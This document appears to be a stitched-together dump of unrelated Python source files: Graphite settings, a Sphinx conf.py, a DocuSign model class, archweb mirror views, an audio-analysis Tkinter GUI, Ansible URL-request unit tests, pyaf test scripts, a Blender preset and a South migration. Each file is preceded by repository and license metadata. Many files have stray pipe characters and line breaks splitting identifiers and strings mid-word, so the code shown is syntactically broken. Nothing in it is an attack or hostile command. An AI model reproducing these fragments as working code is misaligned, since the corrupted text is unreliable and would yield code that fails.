DASHBOARD_CONF = join(CONF_DIR, 'dashboard.conf')
if not GRAPHTEMPLATE
|
S_CONF:
GRAPHTEMPLATES_CONF = join(CONF_DIR, 'graphTemplates.conf')
if not STORAGE_DIR:
STORAGE_DIR = os.environ.get('GRAPHITE_STORAGE_DIR', join(GRAPHITE_ROOT, 'storage'))
if not WHITELIST_FILE:
WHITELIST_FILE = join(STORAGE_DIR, 'lists', 'whitelist')
if not INDEX_FILE:
INDEX_FILE = join(STORAGE_DIR, 'index')
if not LOG_DIR:
LOG_DIR = join(STORAGE_DIR, 'log', 'webapp')
if not WHISPER_DIR:
WHISPER_DIR = join(STORAGE_DIR, 'whisper/'
|
)
if not CERES_DIR:
CERES_DIR = join(STORAGE_DIR, 'ceres/')
if not RRD_DIR:
RRD_DIR = join(STORAGE_DIR, 'rrd/')
if not STANDARD_DIRS:
try:
import whisper
if os.path.exists(WHISPER_DIR):
STANDARD_DIRS.append(WHISPER_DIR)
except ImportError:
print >> sys.stderr, "WARNING: whisper module could not be loaded, whisper support disabled"
try:
import rrdtool
if os.path.exists(RRD_DIR):
STANDARD_DIRS.append(RRD_DIR)
except ImportError:
pass
# Default sqlite db file
# This is set here so that a user-set STORAGE_DIR is available
if 'sqlite3' in DATABASES.get('default',{}).get('ENGINE','') \
and not DATABASES.get('default',{}).get('NAME'):
DATABASES['default']['NAME'] = join(STORAGE_DIR, 'graphite.db')
# Caching shortcuts
if MEMCACHE_HOSTS:
CACHES['default'] = {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': MEMCACHE_HOSTS,
'TIMEOUT': DEFAULT_CACHE_DURATION,
'KEY_PREFIX': MEMCACHE_KEY_PREFIX,
}
# Authentication shortcuts
if USE_LDAP_AUTH and LDAP_URI is None:
LDAP_URI = "ldap://%s:%d/" % (LDAP_SERVER, LDAP_PORT)
if USE_REMOTE_USER_AUTHENTICATION:
MIDDLEWARE_CLASSES += ('django.contrib.auth.middleware.RemoteUserMiddleware',)
AUTHENTICATION_BACKENDS.insert(0,'django.contrib.auth.backends.RemoteUserBackend')
if USE_LDAP_AUTH:
AUTHENTICATION_BACKENDS.insert(0,'graphite.account.ldapBackend.LDAPBackend')
if SECRET_KEY == 'UNSAFE_DEFAULT':
warn('SECRET_KEY is set to an unsafe default. This should be set in local_settings.py for better security')
|
gautsi/cRedditscore
|
docs/conf.py
|
Python
|
bsd-3-clause
| 9,078 | 0.003855 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# cRedditscore documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# To get scipy to load for readthedocs:
class Mock(object):
def __init__(self, *args, **kwargs):
pass
def __call__(self, *args, **kwargs):
return Mock()
@classmethod
def __getattr__(cls, name):
if name in ('__file__', '__path__'):
return '/dev/null'
elif name[0] == name[0].upper():
return type(name, (), {})
else:
return Mock()
MOCK_MODULES = [
'scipy',
'sklearn',
'sklearn.naive_bayes',
'sklearn.feature_extraction',
]
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import cRedditscore
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'cReddit score'
copyright = u'2015, Gautam Sisodia'
# T
|
he version info for the project you're documenting, acts as replacement
# for |version| and |r
|
elease|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = cRedditscore.__version__
# The full version, including alpha/beta/rc tags.
release = cRedditscore.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
# keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'cRedditscoredoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'cRedditscore.tex',
u'cReddit score Documentation',
u'Gautam Sisodia', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cRedditscore',
u'cReddit score Docum
|
docusign/docusign-python-client
|
docusign_esign/models/app_store_product.py
|
Python
|
mit
| 4,127 | 0.000242 |
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AppStoreProduct(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attrib
|
ute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'market_place': 'str',
'product_id': 'str'
}
attribute_map = {
'market_place': 'marketPlace',
'product_id': 'productId'
}
def __init__(self, market_place=None, product_id=None): # noqa: E501
|
"""AppStoreProduct - a model defined in Swagger""" # noqa: E501
self._market_place = None
self._product_id = None
self.discriminator = None
if market_place is not None:
self.market_place = market_place
if product_id is not None:
self.product_id = product_id
@property
def market_place(self):
"""Gets the market_place of this AppStoreProduct. # noqa: E501
# noqa: E501
:return: The market_place of this AppStoreProduct. # noqa: E501
:rtype: str
"""
return self._market_place
@market_place.setter
def market_place(self, market_place):
"""Sets the market_place of this AppStoreProduct.
# noqa: E501
:param market_place: The market_place of this AppStoreProduct. # noqa: E501
:type: str
"""
self._market_place = market_place
@property
def product_id(self):
"""Gets the product_id of this AppStoreProduct. # noqa: E501
The Product ID from the AppStore. # noqa: E501
:return: The product_id of this AppStoreProduct. # noqa: E501
:rtype: str
"""
return self._product_id
@product_id.setter
def product_id(self, product_id):
"""Sets the product_id of this AppStoreProduct.
The Product ID from the AppStore. # noqa: E501
:param product_id: The product_id of this AppStoreProduct. # noqa: E501
:type: str
"""
self._product_id = product_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AppStoreProduct, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppStoreProduct):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
pyropeter/archweb
|
mirrors/views.py
|
Python
|
gpl-2.0
| 4,912 | 0.003054 |
from django import forms
from django.db.models import Avg, Count, Max, Min, StdDev
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.simple import direct_to_template
from main.utils import make_choice
from .models import Mirror, MirrorUrl, MirrorProtocol
from .utils import get_mirror_statuses, get_mirror_errors
import datetime
from operator import attrgetter
class MirrorlistForm(forms.Form):
country = forms.MultipleChoiceField(required=False)
protocol = forms.MultipleChoiceField(required=False)
ip_version = forms.MultipleChoiceField(required=False,
label="IP version", choices=(('4','IPv4'), ('6','IPv6')))
use_mirror_status = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
super(MirrorlistForm, self).__init__(*args, **kwargs)
mirrors = Mirror.objects.filter(active=True).values_list(
'country', flat=True).distinct().order_by('country')
self.fields['country'].choices = [('all','All')] + make_choice(
mirrors)
self.fields['country'].initial = ['all']
protos = make_choice(
MirrorProtocol.objects.filter(is_download=True))
self.fields['protocol'].choices = protos
self.fields['protocol'].initial = [t[0] for t in protos]
self.fields['ip_version'].initial = ['4']
@csrf_exempt
def generate_mirrorlist(request):
if request.REQUEST.get('country', ''):
form = MirrorlistForm(data=request.REQUEST)
if form.is_valid():
countries = form.cleaned_data['country']
protocols = form.cleaned_data['protocol']
use_status = form.cleaned_data['use_mirror_status']
ipv4 = '4' in form.cleaned_data['ip_version']
ipv6 = '6' in form.cleaned_data['ip_version']
return find_mirrors(request, countries, protocols,
use_status, ipv4, ipv6)
else:
form = MirrorlistForm()
return direct_to_template(request, 'mirrors/index.html', {'mirrorlist_form': form})
def find_mirrors(request, countries=None, protocols=None, use_status=False,
ipv4_supported=True, ipv6_supported=True):
if not protocols:
protocols = MirrorProtocol.objects.filter(
is_download=True).values_list('protocol', flat=True)
qset = MirrorUrl.objects.select_related().filter(
protocol__protocol__in=protocols,
mirror__public=True, mirror__active=True, mirror__isos=True
)
if countries and 'all' not in countries:
qset = qset.filter(mirror__country__in=countries)
ip_version = Q()
if ipv4_supported:
ip_version |= Q(has_ipv4=True)
if ipv6_supported:
ip_version |= Q(has_ipv6=True)
qset = qset.filter(ip_version)
if not use_status:
urls = qset.order_by('mirror__country', 'mirror__name', 'url')
template = 'mirrors/mirrorlist.txt'
else:
status_info = get_mirror_statuses()
scores = dict([(u.id, u.score) for u in status_info['urls']])
urls = []
for u in qset:
u.score = scores[u.id]
if u.score and u.score < 100.0:
urls.append(u)
urls = sorted(urls, key=attrgetter('score'))
template = 'mirrors/mirrorlist_status.txt'
return direct_to_template(request, template, {
'mirror_urls': urls,
},
mimetype='text/plain')
def mirrors(request):
mirrors = Mirror.objects.select_related().order_by('tier', 'country')
if not request.user.is_authenticated():
mirrors = mirrors.filter(public=True, active=True)
return direct_to_template(request, 'm
|
irrors/mirrors.html',
{'mirror_list': mirrors})
def mirror_details(request, name):
mirror = get_object_or_404(Mirror, name=name)
if not request.user.is_authenticated() and \
(not mirror.public or not mirror.active):
# TODO: maybe this should be 403? but that would leak existence
raise Http404
return direct_to_template(request, 'mirrors/mirror_details.html',
{'mirror': mirror})
def status(request):
bad_ti
|
medelta = datetime.timedelta(days=3)
status_info = get_mirror_statuses()
urls = status_info['urls']
good_urls = []
bad_urls = []
for url in urls:
# split them into good and bad lists based on delay
if not url.delay or url.delay > bad_timedelta:
bad_urls.append(url)
else:
good_urls.append(url)
context = status_info.copy()
context.update({
'good_urls': good_urls,
'bad_urls': bad_urls,
'error_logs': get_mirror_errors(),
})
return direct_to_template(request, 'mirrors/status.html', context)
# vim: set ts=4 sw=4 et:
|
georgid/sms-tools
|
software/models_interface/dftModel_GUI_frame.py
|
Python
|
agpl-3.0
| 4,273 | 0.040019 |
# GUI frame for the dftModel_function.py
from Tkinter import *
import tkFileDialog, tkMes
|
sageBox
import sys, os
import pygame
from scipy.io.wavfile import read
import dftModel_function
class DftModel_frame:
def __init__(self, parent):
self.parent = parent
self.initUI()
pygame.init()
def initUI(self):
choose_label = "Input file (.wav, mono and 44100 sampling rate):"
Label(self.parent, te
|
xt=choose_label).grid(row=0, column=0, sticky=W, padx=5, pady=(10,2))
#TEXTBOX TO PRINT PATH OF THE SOUND FILE
self.filelocation = Entry(self.parent)
self.filelocation.focus_set()
self.filelocation["width"] = 25
self.filelocation.grid(row=1,column=0, sticky=W, padx=10)
self.filelocation.delete(0, END)
self.filelocation.insert(0, '../../sounds/piano.wav')
#BUTTON TO BROWSE SOUND FILE
self.open_file = Button(self.parent, text="Browse...", command=self.browse_file) #see: def browse_file(self)
self.open_file.grid(row=1, column=0, sticky=W, padx=(220, 6)) #put it beside the filelocation textbox
#BUTTON TO PREVIEW SOUND FILE
self.preview = Button(self.parent, text=">", command=self.preview_sound, bg="gray30", fg="white")
self.preview.grid(row=1, column=0, sticky=W, padx=(306,6))
## DFT MODEL
#ANALYSIS WINDOW TYPE
wtype_label = "Window type:"
Label(self.parent, text=wtype_label).grid(row=2, column=0, sticky=W, padx=5, pady=(10,2))
self.w_type = StringVar()
self.w_type.set("blackman") # initial value
window_option = OptionMenu(self.parent, self.w_type, "rectangular", "hanning", "hamming", "blackman", "blackmanharris")
window_option.grid(row=2, column=0, sticky=W, padx=(95,5), pady=(10,2))
#WINDOW SIZE
M_label = "Window size (M):"
Label(self.parent, text=M_label).grid(row=3, column=0, sticky=W, padx=5, pady=(10,2))
self.M = Entry(self.parent, justify=CENTER)
self.M["width"] = 5
self.M.grid(row=3,column=0, sticky=W, padx=(115,5), pady=(10,2))
self.M.delete(0, END)
self.M.insert(0, "511")
#FFT SIZE
N_label = "FFT size (N) (power of two bigger than M):"
Label(self.parent, text=N_label).grid(row=4, column=0, sticky=W, padx=5, pady=(10,2))
self.N = Entry(self.parent, justify=CENTER)
self.N["width"] = 5
self.N.grid(row=4,column=0, sticky=W, padx=(270,5), pady=(10,2))
self.N.delete(0, END)
self.N.insert(0, "1024")
#TIME TO START ANALYSIS
time_label = "Time in sound (in seconds):"
Label(self.parent, text=time_label).grid(row=5, column=0, sticky=W, padx=5, pady=(10,2))
self.time = Entry(self.parent, justify=CENTER)
self.time["width"] = 5
self.time.grid(row=5, column=0, sticky=W, padx=(180,5), pady=(10,2))
self.time.delete(0, END)
self.time.insert(0, ".2")
#BUTTON TO COMPUTE EVERYTHING
self.compute = Button(self.parent, text="Compute", command=self.compute_model, bg="dark red", fg="white")
self.compute.grid(row=6, column=0, padx=5, pady=(10,15), sticky=W)
# define options for opening file
self.file_opt = options = {}
options['defaultextension'] = '.wav'
options['filetypes'] = [('All files', '.*'), ('Wav files', '.wav')]
options['initialdir'] = '../../sounds/'
options['title'] = 'Open a mono audio file .wav with sample frequency 44100 Hz'
def preview_sound(self):
filename = self.filelocation.get()
if filename[-4:] == '.wav':
fs, x = read(filename)
else:
tkMessageBox.showerror("Wav file", "The audio file must be a .wav")
return
if len(x.shape) > 1 :
tkMessageBox.showerror("Stereo file", "Audio file must be Mono not Stereo")
elif fs != 44100:
tkMessageBox.showerror("Sample Frequency", "Sample frequency must be 44100 Hz")
else:
sound = pygame.mixer.Sound(filename)
sound.play()
def browse_file(self):
self.filename = tkFileDialog.askopenfilename(**self.file_opt)
#set the text of the self.filelocation
self.filelocation.delete(0, END)
self.filelocation.insert(0,self.filename)
def compute_model(self):
try:
inputFile = self.filelocation.get()
window = self.w_type.get()
M = int(self.M.get())
N = int(self.N.get())
time = float(self.time.get())
dftModel_function.extractHarmSpec(inputFile, window, M, N, time)
except ValueError as errorMessage:
tkMessageBox.showerror("Input values error",errorMessage)
|
cchurch/ansible
|
test/units/module_utils/urls/test_Request.py
|
Python
|
gpl-3.0
| 14,937 | 0.001674 |
# -*- coding: utf-8 -*-
# (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import datetime
import os
from ansible.module_utils.urls import (Request, open_url, urllib_request, HAS_SSLCONTEXT, cookiejar, RequestWithMethod,
UnixHTTPHandler, UnixHTTPSConnection, httplib)
from ansible.module_utils.urls import SSLValidationHandler, HTTPSClientAuthHandler, RedirectHandlerFactory
import pytest
from mock import call
if HAS_SSLCONTEXT:
import ssl
@pytest.fixture
def urlopen_mock(mocker):
return mocker.patch('ansible.module_utils.urls.urllib_request.urlopen')
@pytest.fixture
def install_opener_mock(mocker):
return mocker.patch('ansible.module_utils.urls.urllib_request.install_opener')
def test_Request_fallback(urlopen_mock, install_opener_mock, mocker):
cookies = cookiejar.CookieJar()
request = Request(
headers={'foo': 'bar'},
use_proxy=False,
force=True,
timeout=100,
validate_certs=False,
url_username='user',
url_password='passwd',
http_agent='ansible-tests',
force_basic_auth=True,
follow_redirects='all',
client_cert='/tmp/client.pem',
client_key='/tmp/client.key',
cookies=cookies,
unix_socket='/foo/bar/baz.sock',
ca_path='/foo/bar/baz.pem',
)
fallback_mock = mocker.spy(request, '_fallback')
r = request.open('GET', 'https://ansible.com')
calls = [
call(None, False), # use_proxy
call(None, True), # force
call(None, 100), # timeout
call(None, False), # validate_certs
call(None, 'user'), # url_username
call(None, 'passwd'), # url_password
call(None, 'ansible-tests'), # http_agent
call(None, True), # force_basic_auth
call(None, 'all'), # follow_redirects
call(None, '/tmp/client.pem'), # client_cert
call(None, '/tmp/client.key'), # client_key
call(None, cookies), # cookies
call(None, '/foo/bar/baz.sock'), # unix_socket
call(None, '/foo/bar/baz.pem'), # ca_path
]
fallback_mock.assert_has_calls(calls)
assert fallback_mock.call_count == 14 # All but headers use fallback
args = urlopen_mock.call_args[0]
assert args[1] is None # data, this is handled in the Request not urlopen
assert args[2] == 100 # timeout
req = args[0]
assert req.headers == {
'Authorization': b'Basic dXNlcjpwYXNzd2Q=',
'Cache-control': 'no-cache',
'Foo': 'bar',
'User-agent': 'ansible-tests'
}
assert req.data is None
assert req.get_method() == 'GET'
def test_Request_open(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'https://ansible.com/')
args = urlopen_mock.call_args[0]
assert args[1] is None # data, this is handled in the Request not urlopen
assert args[2] == 10 # timeout
req = args[0]
assert req.headers == {}
assert req.data is None
assert req.get_method() == 'GET'
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
if not HAS_SSLCONTEXT:
expected_handlers = (
SSLValidationHandler,
RedirectHandlerFactory(), # factory, get handler
)
else:
expected_handlers = (
RedirectHandlerFactory(), # factory, get handler
)
found_handlers = []
for handler in handlers:
if isinstance(handler, SSLValidationHandler) or handler.__class__.__name__ == 'RedirectHandler':
found_handlers.append(handler)
assert len(found_handlers) == len(expected_handlers)
def test_Request_open_http(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, SSLValidationHandler):
found_handlers.append(handler)
assert len(found_handlers) == 0
def test_Request_open_unix_socket(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', unix_socket='/foo/bar/baz.sock')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, UnixHTTPHandler):
found_handlers.append(handler)
assert len(found_handlers) == 1
def test_Request_open_https_unix_socket(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'https://ansible.com/', unix_socket='/foo/bar/baz.sock')
args = urlopen_mock.call_args[0]
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
found_handlers = []
for handler in handlers:
if isinstance(handler, HTTPSClientAuthHandler):
found_handlers.append(handler)
assert len(found_handlers) == 1
inst = found_handlers[0]._build_https_connection('foo')
assert isinstance(inst, UnixHTTPSConnection)
def test_Request_open_ftp(urlopen_mock, install_opener_mock, mocker):
mocker.patch('ansible.module_utils.urls.ParseResultDottedDict.as_list', side_effect=AssertionError)
# Using ftp scheme should prevent the AssertionError side effect to fire
r = Request().open('GET', 'ftp://foo@ansible.com/')
def test_Request_open_headers(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', headers={'Foo': 'bar'})
args = urlopen_mock.call_args[0]
req = args[0]
assert req.headers == {'Foo': 'bar'}
def test_Request_open_username(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', url_username='user')
opener = install_op
|
ener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
if isinstance(handler, expected_handle
|
rs):
found_handlers.append(handler)
assert len(found_handlers) == 2
assert found_handlers[0].passwd.passwd[None] == {(('ansible.com', '/'),): ('user', None)}
def test_Request_open_username_in_url(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://user2@ansible.com/')
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
if isinstance(handler, expected_handlers):
found_handlers.append(handler)
assert found_handlers[0].passwd.passwd[None] == {(('ansible.com', '/'),): ('user2', '')}
def test_Request_open_username_force_basic(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://ansible.com/', url_username='user', url_password='passwd', force_basic_auth=True)
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_request.HTTPDigestAuthHandler,
)
found_handlers = []
for handler in handlers:
if isinstance(handler, expected_handlers):
found_handlers.append(handler)
assert len(found_handlers) == 0
args = urlopen_mock.call_args[0]
req = args[0]
assert req.headers.get('Authorization') == b'Basic dXNlcjpwYXNzd2Q='
def test_Request_open_auth_in_netloc(urlopen_mock, install_opener_mock):
r = Request().open('GET', 'http://user:passwd@ansible.com/')
args = urlopen_mock.call_args[0]
req = args[0]
assert req.get_full_url() == 'http://ansible.com/'
opener = install_opener_mock.call_args[0][0]
handlers = opener.handlers
expected_handlers = (
urllib_request.HTTPBasicAuthHandler,
urllib_
|
szopu/datadiffs
|
datadiffs/exceptions.py
|
Python
|
mit
| 46 | 0 |
class InvalidValueSta
|
te(Valu
|
eError):
pass
|
antoinecarme/pyaf
|
tests/artificial/transf_Integration/trend_ConstantTrend/cycle_12/ar_12/test_artificial_128_Integration_ConstantTrend_12_12_0.py
|
Python
|
bsd-3-clause
| 271 | 0.084871 |
import pyaf.Bench.TS_datasets as tsds
import test
|
s.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Integration",
|
sigma = 0.0, exog_count = 0, ar_order = 12);
|
Microvellum/Fluid-Designer
|
win64-vc/2.78/Python/bin/2.78/scripts/addons/presets/operator/mesh.primitive_round_cube_add/Capsule.py
|
Python
|
gpl-3.0
| 141 | 0 |
import bpy
op = bpy.context.ac
|
tive_operator
op.radius = 0.5
op.arc_div = 8
op.lin_div = 0
op.size = (0.0, 0.0, 3.0)
op.div_type = 'COR
|
NERS'
|
SeedScientific/polio
|
source_data/migrations/0113_auto__del_field_sourceregion_is_high_risk.py
|
Python
|
agpl-3.0
| 20,716 | 0.008351 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'SourceRegion.is_high_risk'
db.execute('''
ALTER TABLE source_region
DROP COLUMN is_high_risk;
''')
def backwards(self, orm):
# Adding field 'SourceRegion.is_high_risk'
pass
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'datapoints.campaign': {
'Meta': {'ordering': "('-start_date',)", 'unique_together': "(('office', 'start_date'),)", 'object_name': 'Campaign', 'db_table': "'campaign'"},
'campaign_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.CampaignType']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'office': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Office']"}),
